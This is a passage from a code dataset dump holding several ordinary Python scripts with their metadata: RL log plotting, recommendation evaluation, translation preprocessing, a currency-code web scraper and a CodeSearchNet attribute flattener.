window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata2 = signal.medfilt(data2, window_size)\r\n\t\ttmp, = plt.plot(data2, label=filename2.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tplt.legend(handles=handles)\r\n\t\tplt.grid(True)\r\n\t\tplt.savefig(save_dir+filename1.split('/')[-1][:-3]+'--vs--'+filename2.split('/')[-1][:-3]+'-'+field_names[field]+'.png')\r\n\t\tplt.show()\r\n\r\ndef write_csv(in_filename=None, out_filename=None):\r\n\tf_in = h5py.File(in_filename,'r')\r\n\tlog = f_in['log']\r\n\tf_out = open(out_filename,'w')\r\n\t# field_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"nu\", \"Lambda\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfield_names = [\"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"rloss\", \"racc\", \"rgrad\"]\r\n\t# print fields\r\n\tfor field in field_names:\r\n\t\tf_out.write(field+',')\r\n\tf_out.write('\\n')\r\n\r\n\t# print the log data line by line\r\n\tfor line_num in range(log.shape[0]):\r\n\t\tfor entry in log[line_num]:\r\n\t\t\tf_out.write(str(entry)+',')\r\n\t\tf_out.write('\\n')\r\n\tf_out.close()\r\n\r\n\r\ndef plot_csv(file_name, use_moving_average, moving_average_window_size, plot_all_fields, plot_fields, save_dir, expert_level):\r\n\tdf = pd.read_csv(file_name, sep=',')\r\n\ttitles = list(df)\r\n\tplt.figure()\r\n\thandles = []\r\n\tif plot_all_fields:\r\n\t\tfor i in range(len(titles)):\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\telse:\r\n\t\tfor i in plot_fields:\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(expert_level*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+file_name.split('/')[-1][:-4]+'.png')\r\n\tplt.show()\r\n\r\n\r\nif __name__=='__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--plot_single', action='store_true')\r\n\tparser.add_argument('--plot_fancy', action='store_true')\r\n\tparser.add_argument('--plot_fancy_raw', 
action='store_true')\r\n\tparser.add_argument('--file_name', type=str, help=\".h5 file path if --plot_single or --write_csv and .csv file path if --plot_csv\")\r\n\tparser.add_argument('--compare', action='store_true')\r\n\tparser.add_argument('--file_name1', type=str, help=\".h5 file path 1 if --compare\")\r\n\tparser.add_argument('--file_name2', type=str, help=\".h5 file path 2 if --compare\")\r\n\tparser.add_argument('--save_dir', type=str, default=\"./\", help=\"directory for saving plots\")\r\n\tparser.add_argument('--use_moving_average', action='store_true')\r\n\tparser.add_argument('--use_median_filtering', action='store_true')\r\n\tparser.add_argument('--moving_average_window_size', type=int, default=3)\r\n\tparser.add_argument('--write_csv', action='store_true')\r\n\tparser.add_argument('--plot_csv', action='store_true')\r\n\tparser.add_argument('--plot_all_fields', action='store_true')\r\n\t#TODO: fix the following line - add separate conditions for different fields\r\n\tparser.add_argument('--expert_level', type=float, default=EXPERT_STD)\r\n\r\n\targs = parser.parse_args()\r\n\tfields_to_plot = [1,3]\r\n\tif args.plot_single:\r\n\t\tplot_log_file(args.file_name, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.compare:\r\n\t\tcompare_methods(filename1=args.file_name1, filename2=args.file_name2, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, window_size=args.moving_average_window_size)\r\n\telif args.write_csv:\r\n\t\tout_filename = args.save_dir+args.file_name.split('/')[-1][:-3]+'.csv'\r\n\t\twrite_csv(args.file_name, out_filename)\r\n\telif args.plot_csv:\r\n\t\tplot_fields = [0,1,-1]\r\n\t\tplot_csv(file_name=args.file_name, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size, plot_all_fields=args.plot_all_fields, plot_fields=plot_fields, save_dir=args.save_dir, expert_level=args.expert_level)\r\n\telif args.plot_fancy:\r\n\t\tplot_log_file_fancy(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.plot_fancy_raw:\r\n\t\tplot_log_file_mean_with_raw(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n", "repo_name": "Santara/RAIL", "sub_path": "scripts/read_h5_logs_and_analyse.py", "file_name": "read_h5_logs_and_analyse.py", "file_ext": "py", "file_size_in_byte": 8827, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 16, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 31, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 73, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": 
"h5py.File", "line_number": 92, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 166, "usage_type": "call"}]}
+{"seq_id": "23852145195", "text": "# evaluation.py \n# script holding function to evaluate the quality of recommendation based on queried metadata\n\n# last modified : 29/11/21\n# author : jonas-mika senghaas\n\nimport json\nimport os\nimport numpy as np\nfrom tqdm import tqdm\n\n\n#from envvars import GITHUB_TOKEN\n#from github_api import ReposSummary\n\n\"\"\"\n# expected format for recommendations\nmetadata = {'luky/na': {'languages': [['Python', 550], ['Java', 220]]}, \n 'jonas-mika/eduml': {'languages': [['Python', 2000]]},\n 'ludek/dotfiles': {'languages': [['vim', 220], ['Python', 100]]}\n }\n\ndata = {'rails/rails': ['technoweenie/restful-authentication']}\n\n\"\"\"\ndef build_evaluation_metadata(metadata, attributes, filepath='.', name='evaluation_metadata'):\n os.makedirs(filepath) if not os.path.exists(filepath) else None\n\n ans = {}\n for key, val in metadata.items():\n try:\n nkey = metadata[key]['repo_name']\n nval = {attribute: metadata[key][attribute] for attribute in attributes}\n except: None\n\n ans[nkey] = nval\n\n with open(f'{filepath}/{name}.json', 'w') as outfile:\n json.dump(ans, outfile)\n\n\n\ndef evaluate_recommendation(recommendations, metadata, attributes, test_size=0.5, total_score=False):\n \"\"\"\n function to evaluate the quality of the recommendation based on metadata.\n reads in underlying datastructure of the recommendation system (a dictionary that \n for each repo stores a list of n recommended repos, each being stored as a dictionary\n themselves with key being the recommended repo name and values being a dict of the metadata.\n\n Algorithmic Idea for Evaluation:\n A 'good recommendation' is defined to be a repository that is similar in some instances to \n the source repository. Thus, the idea is to assign a score of similarity \n for different features of the recommended repositories, namely for:\n - languages ( len of intersection / length of union of languages for each repo)\n - tags ( len of intersectio / length of union of repos for each repo)\n\n the score is averaged over the n recommended repository, the per repo score is a weighted\n average. 
the total score is averaged over all recommendations.\n \"\"\"\n n_repos = len(recommendations)\n\n\n if isinstance(test_size, int):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=test_size, replace=False) \n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n elif isinstance(test_size, float):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=int(test_size*n_repos), replace=False)\n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n\n random_sample = recommendations\n attribute_scores = {attribute: None for attribute in attributes}\n for attribute in attributes:\n attribute_score = _evaluate_attribute(random_sample, \n metadata, \n attribute, \n algorithm='jaccard', normalise=True)\n attribute_scores[attribute] = attribute_score\n\n if total_score:\n return np.mean(list(attribute_scores.values()))\n return attribute_scores\n\n\ndef _evaluate_attribute(random_sample, metadata, attribute, algorithm='jaccard', normalise=True):\n attribute_score = 0\n\n n_repos = len(random_sample)\n #n_recommend = len(list(random_sample.values())[0])\n\n # api = ReposSummary(GITHUB_TOKEN)\n\n src_missing = 0 \n for repo in random_sample: # maybe: subset of repos\n repo_score = 0\n\n src = metadata[repo] \n #print('working on: ', repo)\n src_attr = {x[0] for x in src[attribute]}\n\n if src_attr == None:\n src_missing += 1\n continue\n\n trg_missing = 0\n n_recommend = 0\n for recommended in random_sample[repo]:\n trg = metadata[recommended]\n trg_attr = {x[0] for x in trg[attribute]}\n\n if trg_attr == None:\n trg_missing += 1\n continue\n\n #print(src_attr, trg_attr)\n score = len(src_attr & trg_attr) / len(src_attr | trg_attr)\n #print(score)\n repo_score += score\n n_recommend += 1\n\n # normalise all score\n if n_recommend - trg_missing > 0:\n repo_score /= (n_recommend - trg_missing) \n else:\n repo_score = 0\n #print(repo_score, '\\n')\n attribute_score += repo_score\n\n # normalise summed attributes score and add total score\n if n_repos - src_missing > 0:\n attribute_score /= (n_repos - src_missing)\n else:\n attribute_score = 0\n\n return attribute_score\n\n\nif __name__ == '__main__':\n np.random.seed(0)\n with open('../data/transformed/metadata.json') as infile:\n metadata = json.load(infile)\n\n build_evaluation_metadata(metadata, ['languages'],filepath='../data/evaluation/')\n with open('../data/evaluation/evaluation_metadata.json', 'r') as infile:\n metadata = json.load(infile)\n\n algs = ['naive_hyperbolic','search_depth_hyperbolic'] #['naive_recommend', 'search_depth']\n\n for alg in algs:\n with open(f'./{alg}.json', 'r') as infile:\n data = json.load(infile)\n\n print(alg, ':', evaluate_recommendation(data, metadata, attributes=['languages'], test_size=0.5))\n", "repo_name": "ludekcizinsky/project-repommend", "sub_path": "cscripts/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 5464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": 
"numpy.random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "json.load", "line_number": 144, "usage_type": "call"}, {"api_name": "json.load", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "7091435767", "text": "import re\r\nimport unicodedata\r\nimport torch\r\n\r\nfrom dictionary import Dictionary\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#https://stackoverflow.com/a/518232/2809427\r\ndef unicodeToAscii(s):\r\n return ''.join(\r\n c for c in unicodedata.normalize('NFD', s)\r\n if unicodedata.category(c) != 'Mn'\r\n )\r\n\r\ndef normalizeString(s):\r\n s = unicodeToAscii(s.lower().strip())\r\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\r\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\r\n return s\r\n\r\n#load language into lists of sentences where corresponding indeces are translations from\r\n#one language to the other\r\n\r\n#reverse controls with language is input and output\r\n#FALSE: lang1 is input and lang2 is output\r\n#TRUE: lang2 is input and lang1 is output\r\ndef load_files(lang1, lang2, data_dir, reverse=True, MAX_FILE_SIZE=100000, MAX_LENGTH=60):\r\n #load first language to list\r\n lang1_list = []\r\n lang1_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang1 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang1_file):\r\n if i < MAX_FILE_SIZE:\r\n lang1_list.append(line)\r\n else:\r\n break\r\n\r\n # load second langauge to list\r\n lang2_list = []\r\n lang2_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang2 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang2_file):\r\n if i < MAX_FILE_SIZE:\r\n lang2_list.append(line)\r\n else:\r\n break\r\n\r\n #preprocess strings\r\n lang1_normalized = list(map(normalizeString, lang1_list))\r\n lang2_normalized = list(map(normalizeString, lang2_list))\r\n\r\n lang1_sentences = []\r\n lang2_sentences = []\r\n\r\n for i in range(len(lang1_normalized)):\r\n tokens1 = lang1_normalized[i].split(' ')\r\n tokens2 = lang2_normalized[i].split(' ')\r\n if len(tokens1) <= MAX_LENGTH and len(tokens2) <= MAX_LENGTH:\r\n lang1_sentences.append(lang1_normalized[i])\r\n lang2_sentences.append(lang2_normalized[i])\r\n\r\n del lang1_normalized\r\n del lang2_normalized\r\n\r\n if reverse:\r\n input_dic = Dictionary(lang2)\r\n output_dic = Dictionary(lang1)\r\n return input_dic, output_dic, lang2_sentences, lang1_sentences\r\n else:\r\n input_dic = Dictionary(lang1)\r\n output_dic = Dictionary(lang2)\r\n return input_dic, output_dic, lang1_sentences, lang2_sentences\r\n\r\n#takes in a sentence and dictionary, and tokenizes based on dictionary\r\ndef tokenize(sentence, dictionary, MAX_LENGTH=60):\r\n split_sentence = [word for word in sentence.split(' ')]\r\n token = [SOS_TOKEN]\r\n token += [dictionary.word2index[word] for word in sentence.split(' ')]\r\n token.append(EOS_TOKEN)\r\n token += [PAD_TOKEN]*(MAX_LENGTH - len(split_sentence))\r\n return token\r\n\r\n#create dataloader from a batch size and the two language lists\r\ndef load_batches(input_lang, output_lang, batch_size, device):\r\n data_loader = []\r\n for i in range(0, len(input_lang), batch_size):\r\n seq_length = min(len(input_lang) - batch_size, batch_size)\r\n input_batch = input_lang[i:i+seq_length][:]\r\n target_batch = output_lang[i:i+seq_length][:]\r\n input_tensor = torch.LongTensor(input_batch).to(device)\r\n target_tensor = torch.LongTensor(target_batch).to(device)\r\n data_loader.append([input_tensor, target_tensor])\r\n return data_loader", "repo_name": "u7javed/Transformer-Multi-Language-Translator", "sub_path": "utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "unicodedata.normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "unicodedata.category", "line_number": 15, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 67, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 68, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 71, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 72, "usage_type": "call"}, {"api_name": "dictionary.word2index", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "27952832416", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = requests.get(\"https://www.iban.com/currency-codes\")\nsoup = BeautifulSoup(URL.text, \"html.parser\")\n\npages = soup.find(\"table\",{\"class\":\"table\"})\npage = pages.find_all(\"tbody\")\n\ntemporarily = {}\nnumber_country = {}\n\ncountries_lists = []\nfor country in page:\n\n a = country.find_all(\"td\")\n a = list(a)\n\n country_list = 0\n code_list = 2\n\n while code_list >= 0:\n b = a[country_list].text\n c = a[code_list].text \n temporarily[f\"{b}\"] = f\"{c}\"\n country_list +=4\n code_list +=4\n if code_list >= len(a):\n break\n results = {key: value for key, value in temporarily.items() if len(value) != 0}\n\ncountries_lists.append(list(results))\ncountries_lists = countries_lists[0]\ncountries_list = [i.strip() for i in countries_lists]\n\n\ndef start():\n country = results.keys() \n max_numb = len(results.keys()) \n number = 0\n print(\"hello, my friend! Please choose select a country by number:\")\n for i in country: \n print(f\" # {number} {i}\")\n number += 1\n if number >= max_numb:\n break\n while[1]:\n try:\n select = int(input(\" # : \")) \n if countries_list[select] in countries_list:\n print(F\" You choose {countries_list[select]} \\n The currency code is {results[countries_list[select]]}\")\n break\n elif type(select) == int:\n print(\" please, enter a number from the list.\")\n else:\n print(\" That's wasn't a number.\") \n except: \n print(\" That's wasn't a number.\")\n\nstart()", "repo_name": "WinterWhiteSnow/github", "sub_path": "~08.01까지/nadocoding/6.18.py", "file_name": "6.18.py", "file_ext": "py", "file_size_in_byte": 1715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "40399551079", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom multiprocessing import Pool, cpu_count\n\nfrom ncc_dataset.codexglue.code_to_text import (\n LANGUAGES, RAW_DIR, ATTRIBUTES_DIR,\n)\nfrom ncc import LOGGER\nfrom ncc.utils.file_ops import (\n file_io,\n json_io,\n)\nfrom ncc.utils.path_manager import PathManager\n\n\ndef flatten_attrs(raw_file, flatten_dir, lang, attrs):\n def _get_file_info(filename):\n \"\"\"get mode and file index from file name\"\"\"\n filename = os.path.split(filename)[-1]\n mode = filename[:str.rfind(filename, '.jsonl')]\n return mode\n\n mode = _get_file_info(raw_file)\n attr_writers = {}\n for attr in attrs:\n attr_file = os.path.join(flatten_dir, lang, f'{mode}.{attr}')\n PathManager.mkdir(os.path.dirname(attr_file))\n attr_writers[attr] = file_io.open(attr_file, 'w')\n print('raw_file: ', raw_file)\n with file_io.open(raw_file, 'r') as reader:\n for line in reader:\n code_snippet = json_io.json_loads(line)\n for attr, info in code_snippet.items():\n if attr in attr_writers:\n print(json_io.json_dumps(info), file=attr_writers[attr])\n\n\ndef flatten(raw_dir, lang, flatten_dir, attrs, num_cores):\n \"\"\"flatten attributes of raw data\"\"\"\n LOGGER.info('Flatten the attributes({}) of {} raw dataset'.format(attrs, lang))\n\n with Pool(num_cores) as mpool:\n result = [\n mpool.apply_async(\n flatten_attrs,\n (raw_file, flatten_dir, lang, set(attrs))\n )\n for raw_file in PathManager.ls(os.path.join(raw_dir, lang, '*.jsonl'))\n ]\n result = [res.get() for res in result]\n\n\nif __name__ == '__main__':\n \"\"\"\n This script is to flatten attributes of code_search_net dataset\n Examples: 'code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name', 'original_string', 'index',\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Download CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--languages\", \"-l\", default=LANGUAGES, type=str, nargs='+', help=\"languages constain [{}]\".format(LANGUAGES),\n )\n parser.add_argument(\n \"--raw_dataset_dir\", \"-r\", default=RAW_DIR, type=str, help=\"raw dataset download directory\",\n )\n parser.add_argument(\n \"--attributes_dir\", \"-d\", default=ATTRIBUTES_DIR, type=str, help=\"data directory of flatten attribute\",\n )\n parser.add_argument(\n \"--attrs\", \"-a\",\n default=['code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name'],\n type=str, nargs='+',\n help=\"attrs: code, code_tokens, docstring\",\n )\n parser.add_argument(\n \"--cores\", \"-c\", default=cpu_count(), type=int, help=\"cpu cores for flatten raw data attributes\",\n )\n args = parser.parse_args()\n # print(args)\n\n for lang in args.languages:\n flatten(raw_dir=args.raw_dataset_dir, lang=lang, flatten_dir=args.attributes_dir, attrs=args.attrs,\n num_cores=args.cores)\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc_dataset/codexglue/code_to_text/attributes_cast.py", "file_name": "attributes_cast.py", "file_ext": "py", "file_size_in_byte": 3056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.utils.path_manager.PathManager.mkdir", "line_number": 29, "usage_type": "call"}, 
{"api_name": "ncc.utils.path_manager.PathManager", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 30, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 30, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 32, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 32, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_loads", "line_number": 34, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 34, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 37, "usage_type": "name"}, {"api_name": "ncc.LOGGER.info", "line_number": 42, "usage_type": "call"}, {"api_name": "ncc.LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 44, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager.ls", "line_number": 50, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "ncc_dataset.codexglue.code_to_text.LANGUAGES", "line_number": 62, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.RAW_DIR", "line_number": 65, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.ATTRIBUTES_DIR", "line_number": 68, "usage_type": "name"}, {"api_name": "multiprocessing.cpu_count", "line_number": 77, "usage_type": "call"}]}
